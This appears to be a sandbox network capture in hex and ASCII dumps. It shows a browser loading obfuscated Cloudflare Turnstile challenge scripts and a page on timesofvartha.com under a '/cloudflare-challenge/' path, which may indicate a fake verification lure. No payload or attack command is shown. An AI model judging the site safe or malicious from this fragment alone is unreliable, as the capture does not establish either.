2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 3c 69 7d 2c 27 69 5a 52 56 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 73 73 43 67 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 47 48 45 76 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 68 70 4d 56 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 62 45 49 61 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 77 52 43 71 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 51 77 73 61 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 76 6f 78 63 6b 27 3a 66 Data Ascii: <i},'iZRVb':function(h,i){return h==i},'ssCgM':function(h,i){return h<<i},'GHEvo':function(h,i){return h-i},'hpMVZ':function(h,i){return i==h},'bEIae':function(h,i){return h<i},'wRCqd':function(h,i){return h==i},'QwsaQ':function(h,i){return h<i},'voxck':f
2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 35 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 68 41 28 31 30 36 35 29 5d 5b 68 41 28 31 33 34 36 29 5d 5b 68 41 28 34 36 35 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 68 41 28 31 30 36 35 29 5d 5b 68 41 28 31 33 34 36 29 5d 5b 68 41 28 34 36 35 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 68 41 28 31 31 36 37 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 68 41 28 31 31 35 32 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 41 28 31 33 34 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 41 28 31 31 36 37 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 Data Ascii: 5)](x,K)\|\|(x[K]=E++,B[K]=!0),L=C+K,Object[hA(1065)][hA(1346)][hA(465)](x,L))C=L;else{if(Object[hA(1065)][hA(1346)][hA(465)](B,C)){if(256>C[hA(1167)](0)){for(s=0;s<F;H<<=1,d[hA(1152)](I,j-1)?(I=0,G[hA(1343)](o(H)),H=0):I++,s++);for(M=C[hA(1167)](0),s=0;d[h
2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 68 41 28 37 30 38 29 5d 3d 64 5b 68 41 28 31 34 34 37 29 5d 2c 54 5b 68 41 28 31 38 32 39 29 5d 28 55 29 2c 56 3d 49 5b 68 41 28 31 33 34 32 29 5d 28 64 5b 68 41 28 31 30 33 32 29 5d 29 2c 56 5b 68 41 28 31 33 31 30 29 5d 3d 68 41 28 31 30 32 38 29 2c 54 5b 68 41 28 31 38 32 39 29 5d 28 56 29 2c 57 3d 4a 5b 68 41 28 31 33 34 32 29 5d 28 64 5b 68 41 28 31 30 33 32 29 5d 29 2c 57 5b 68 41 28 31 37 31 38 29 5d 3d 53 2c 57 5b 68 41 28 31 33 31 30 29 5d 3d 64 5b 68 41 28 31 38 31 39 29 5d 2c 54 5b 68 41 28 31 38 32 39 29 5d 28 57 29 2c 4b 5b 68 41 28 31 38 32 39 29 5d 28 54 29 2c 4c 28 29 5b 68 41 28 31 38 32 39 29 5d 28 4d 29 2c 55 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 41 28 31 36 31 36 29 5d 28 48 2c 31 29 7c 4d 2c Data Ascii: hA(708)]=d[hA(1447)],T[hA(1829)](U),V=I[hA(1342)](d[hA(1032)]),V[hA(1310)]=hA(1028),T[hA(1829)](V),W=J[hA(1342)](d[hA(1032)]),W[hA(1718)]=S,W[hA(1310)]=d[hA(1819)],T[hA(1829)](W),K[hA(1829)](T),L()[hA(1829)](M),U}else{for(M=1,s=0;s<F;H=d[hA(1616)](H,1)\|M,
2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 68 5b 68 45 28 31 36 36 36 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 45 28 31 31 35 32 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 45 28 38 34 36 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 45 28 31 36 36 36 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 68 45 28 31 38 33 30 29 5d 28 46 2c 4b 29 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 Data Ascii: h[hE(1666)](2,8),F=1;K!=F;L=H&G,H>>=1,d[hE(1152)](0,H)&&(H=j,G=o(I++)),J\|=(d[hE(846)](0,L)?1:0)F,F<<=1);M=e(J);break;case 1:for(J=0,K=Math[hE(1666)](2,16),F=1;d[hE(1830)](F,K);L=G&H,H>>=1,H==0&&(H=j,G=o(I++)),J\|=(0<L?1:0)F,F<<=1);M=e(J);break;case 2:ret
2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 6a 2c 69 63 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 69 63 3d 67 4c 2c 6f 3d 7b 27 6f 58 4e 71 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 70 4f 4d 71 58 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 4e 4e 64 69 45 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 46 6a 4a 41 65 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 71 75 56 73 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 56 69 70 6a 70 27 3a 69 63 28 31 35 30 39 29 2c 27 6b 67 6d 75 6c 27 3a 69 63 28 31 31 36 36 29 2c 27 62 50 74 65 78 27 3a 66 75 6e 63 Data Ascii: j,ic,o,x,B,C,D,E,F){if(ic=gL,o={'oXNql':function(G,H){return G<H},'pOMqX':function(G,H){return G===H},'NNdiE':function(G,H){return G===H},'FjJAe':function(G,H){return G(H)},'quVsO':function(G,H){return H===G},'Vipjp':ic(1509),'kgmul':ic(1166),'bPtex':func
2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 31 32 30 34 29 5d 28 27 66 27 2c 6e 29 26 26 28 6e 3d 27 4e 27 29 2c 68 5b 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6b 5b 69 67 28 31 35 31 37 29 5d 28 6f 2c 69 5b 6c 5b 6d 5d 5d 5b 69 67 28 31 31 30 30 29 5d 29 3b 6b 5b 69 67 28 31 38 35 39 29 5d 28 2d 31 2c 68 5b 6e 5d 5b 69 67 28 37 32 33 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 26 26 28 66 42 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e 5d 5b 69 67 28 31 33 34 33 29 5d 28 27 6f 2e 27 2b 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 69 67 28 31 33 38 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 73 7d 29 7d 2c 65 4d 5b 67 4c 28 35 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 68 2c 64 2c 65 2c 66 2c Data Ascii: 1204)]('f',n)&&(n='N'),h[n]){for(o=0;k[ig(1517)](o,i[l[m]][ig(1100)]);k[ig(1859)](-1,h[n][ig(723)](i[l[m]][o]))&&(fB(i[l[m]][o])\|\|h[n][ig(1343)]('o.'+i[l[m]][o])),o++);}else h[n]=i[l[m]][ig(1387)](function(s){return'o.'+s})},eM[gL(565)]=function(ih,d,e,f,
2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 35 30 37 29 5d 5b 69 6a 28 37 32 32 29 5d 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 51 5b 69 6a 28 31 37 30 31 29 5d 26 26 28 4a 3d 7b 7d 2c 4a 5b 69 6a 28 31 39 31 39 29 5d 3d 69 5b 69 6a 28 31 38 38 32 29 5d 2c 4a 5b 69 6a 28 37 34 35 29 5d 3d 61 30 5b 69 6a 28 31 35 30 37 29 5d 5b 69 6a 28 38 39 33 29 5d 2c 4a 5b 69 6a 28 31 32 34 38 29 5d 3d 69 6a 28 31 33 33 36 29 2c 5a 5b 69 6a 28 31 37 30 31 29 5d 5b 69 6a 28 31 35 35 31 29 5d 28 4a 2c 27 2a 27 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 43 3d 21 21 5b 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 49 26 26 69 5b 69 6a 28 31 34 30 33 29 5d 28 54 2c 55 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 69 5b 69 6a 28 31 33 36 34 29 5d 28 46 29 3b 63 Data Ascii: 507)][ij(722)]));continue;case'2':Q[ij(1701)]&&(J={},J[ij(1919)]=i[ij(1882)],J[ij(745)]=a0[ij(1507)][ij(893)],J[ij(1248)]=ij(1336),Z[ij(1701)][ij(1551)](J,'*'));continue;case'3':C=!![];continue;case'4':I&&i[ij(1403)](T,U);continue;case'5':i[ij(1364)](F);c

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:49 UTC	742	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:49 UTC	240	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:49 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 8e497d886f366b45-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:49 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:50 UTC	611	OUT	GET /favicon.ico HTTP/1.1 Host: timesofvartha.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://timesofvartha.com/cloudflare-challenge/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:50 UTC	261	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 16:55:50 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 15 Mar 2022 22:06:31 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html
2024-11-18 16:55:50 UTC	583	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:51 UTC	433	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:51 UTC	331	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:51 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 131466 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8e497d923f2b285f-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:51 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 Data Ascii: age%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_overrun_description":"Stuck%20here%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_description":"Send%20Feedba
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 31 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 39 33 39 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 31 31 29 29 2f 38 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 32 38 34 29 29 2f 39 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 37 38 31 29 29 2f 31 30 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 31 31 32 39 34 35 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 39 30 34 29 5d 2c 65 4f 3d 5b 5d 2c 65 50 3d 30 3b 32 35 36 3e 65 50 3b 65 4f 5b 65 50 5d 3d 53 74 72 69 6e 67 5b 67 4c 28 31 34 33 38 29 5d 28 65 50 29 2c 65 50 2b 2b 29 3b 65 51 3d Data Ascii: 1))/6(-parseInt(gK(939))/7)+-parseInt(gK(1411))/8+parseInt(gK(1284))/9(-parseInt(gK(1781))/10),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,112945),eM=this\|\|self,eN=eM[gL(904)],eO=[],eP=0;256>eP;eO[eP]=String[gL(1438)](eP),eP++);eQ=
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 76 6d 45 54 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 59 4d 66 4e 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 71 7a 4e 78 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 6f 62 77 53 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 45 74 49 50 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 49 59 65 62 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4c 51 76 46 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d Data Ascii: ,i){return h(i)},'vmETL':function(h,i){return h(i)},'YMfNh':function(h,i){return h&i},'qzNxX':function(h,i){return h*i},'obwSl':function(h,i){return h<i},'EtIPD':function(h,i){return h&i},'IYebk':function(h,i){return h(i)},'LQvFj':function(h,i){return h==
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 31 34 29 5d 28 73 2c 46 29 3b 48 3d 48 3c 3c 31 2e 30 39 7c 31 2e 37 36 26 4d 2c 64 5b 68 79 28 32 30 33 31 29 5d 28 49 2c 64 5b 68 79 28 31 30 37 38 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 79 28 35 37 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 68 79 28 31 30 34 32 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 64 5b 68 79 28 31 34 30 34 29 5d 28 53 74 72 69 6e 67 2c 4b 29 29 7d 69 66 28 43 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 68 79 28 39 31 32 29 5d 5b 68 79 28 39 32 30 29 5d 5b 68 79 28 32 30 36 34 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 68 79 28 35 32 30 29 5d 28 30 29 29 7b 66 6f 72 28 Data Ascii: 14)](s,F);H=H<<1.09\|1.76&M,d[hy(2031)](I,d[hy(1078)](j,1))?(I=0,G[hy(571)](o(H)),H=0):I++,M>>=1,s++);C=(D--,D==0&&(D=Math[hy(1042)](2,F),F++),x[L]=E++,d[hy(1404)](String,K))}if(C!==''){if(Object[hy(912)][hy(920)][hy(2064)](B,C)){if(256>C[hy(520)](0)){for(
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 21 3d 3d 6a 5b 68 42 28 31 30 32 38 29 5d 29 7b 69 66 28 6c 5b 68 42 28 39 37 34 29 5d 28 69 2c 21 5b 5d 29 29 72 65 74 75 72 6e 3b 28 6a 3d 21 5b 5d 2c 6b 28 29 2c 6c 5b 68 42 28 31 33 38 38 29 5d 29 26 26 28 6e 3d 7b 7d 2c 6e 5b 68 42 28 31 36 31 39 29 5d 3d 68 42 28 31 39 39 32 29 2c 6e 5b 68 42 28 31 36 37 34 29 5d 3d 73 5b 68 42 28 31 39 34 34 29 5d 5b 68 42 28 37 33 39 29 5d 2c 6e 5b 68 42 28 31 33 35 31 29 5d 3d 68 42 28 31 38 34 31 29 2c 6f 5b 6c 5b 68 42 28 31 36 34 36 29 5d 5d 5b 68 42 28 31 38 37 32 29 5d 28 6e 2c 27 2a 27 29 29 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 68 5b 68 42 28 35 32 30 29 5d 28 6b 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 68 43 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a Data Ascii: !==j[hB(1028)]){if(l[hB(974)](i,![]))return;(j=![],k(),l[hB(1388)])&&(n={},n[hB(1619)]=hB(1992),n[hB(1674)]=s[hB(1944)][hB(739)],n[hB(1351)]=hB(1841),o[l[hB(1646)]][hB(1872)](n,'*'))}else return h[hB(520)](k)})},'i':function(i,j,o,hC,s,x,B,C,D,E,F,G,H,I,J
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 43 28 31 32 37 33 29 5d 28 27 27 29 7d 69 66 28 64 5b 68 43 28 31 34 38 33 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 68 43 28 31 30 34 32 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 42 3d 3d 3d 4d 29 4d 3d 64 5b 68 43 28 35 33 32 29 5d 28 45 2c 45 5b 68 43 28 37 32 37 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 68 43 28 35 37 31 29 5d 28 4d 29 2c 73 5b 42 2b 2b 5d 3d 64 5b 68 43 28 35 33 32 29 5d 28 45 2c 4d 5b 68 43 28 37 32 37 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d 4d 2c 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 68 43 28 31 30 34 32 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 77 28 31 33 31 39 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c Data Ascii: C(1273)]('')}if(d[hC(1483)](0,x)&&(x=Math[hC(1042)](2,C),C++),s[M])M=s[M];else if(B===M)M=d[hC(532)](E,E[hC(727)](0));else return null;D[hC(571)](M),s[B++]=d[hC(532)](E,M[hC(727)](0)),x--,E=M,0==x&&(x=Math[hC(1042)](2,C),C++)}}},g={},g[hw(1319)]=f.h,g}(),
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 29 29 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 6f 5b 68 47 28 32 30 35 33 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 73 28 69 2b 44 2c 45 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 21 21 5b 5d 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 48 29 7b 68 48 3d 68 47 2c 4f 62 6a 65 63 74 5b 68 48 28 39 31 32 29 5d 5b 68 48 28 39 32 30 29 5d 5b 68 48 28 32 30 36 34 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 68 48 28 35 37 31 29 5d 28 47 29 7d 7d 2c 66 71 3d 67 4c 28 39 36 35 29 5b 67 4c 28 36 31 37 29 5d 28 27 3b 27 29 2c 66 72 3d 66 71 5b 67 4c 28 31 39 39 34 29 5d 5b 67 4c 28 39 30 37 29 5d 28 66 71 29 2c 65 4d 5b 67 4c 28 37 34 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 68 4a 2c 69 2c 6a Data Ascii: ))?s(i+D,E):F\|\|s(o[hG(2053)](i,D),h[D])):s(i+D,E);else return!![];return j;function s(G,H,hH){hH=hG,Object[hH(912)][hH(920)][hH(2064)](j,H)\|\|(j[H]=[]),j[H][hH(571)](G)}},fq=gL(965)[gL(617)](';'),fr=fq[gL(1994)][gL(907)](fq),eM[gL(743)]=function(g,h,hJ,i,j
